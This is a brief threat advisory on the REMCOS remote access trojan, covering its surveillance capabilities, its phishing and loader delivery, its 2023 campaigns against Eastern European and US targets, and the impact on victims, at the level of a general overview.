Overview

REMCOS RAT is a remote access trojan that has been widely used in cybercriminal and espionage campaigns. It is known for its ability to hijack computers, collect keystrokes, audio, video, screenshots, and system data, as well as deliver additional malware payloads. The malware is often delivered through phishing emails with malicious attachments or links that lead to the installation of the RAT. REMCOS has also been observed being delivered through the DBatLoader malware loader and GuLoader. The malware is sold commercially by Breaking Security but has been used for malicious purposes since the mid-2010s.

It has been observed in various parts of the world and is known for its stealthy behaviour, including the use of public cloud infrastructure and anti-analysis techniques. The most recent events involving REMCOS RAT include a phishing campaign targeting Eastern European institutions and businesses with DbatLoader and REMCOS RAT malware in March 2023, and a new campaign targeting US accounting and tax return preparation firms ahead of Tax Day in April 2023. In recent months, there have also been several reports of REMCOS being used in campaigns targeting Ukrainian government entities and organisations in Eastern Europe.

REMCOS works by initially using brute force attacks on insecure servers then gaining access , taking control of the PowerShell utility, downloading, and installing an obfuscated Visual Basic script file which is then executed. After the malware has executed, a wide range of tools can be used such as screen capture, key logging and many more.

Impact

If the REMCOS is successfully executed, it will lead to full control and surveillance of the target system which will allow threat actors to exfiltrate sensitive data over a potentially long period of time, if undetected. Use of this sensitive data, depending on the target, could lead to victims being blackmailed, loss of employment if company data is involved and stolen organisational data which could be used to launch a large-scale sophisticated attack. It is likely that this would lead to irreparable damage to organisations or individuals’ livelihoods.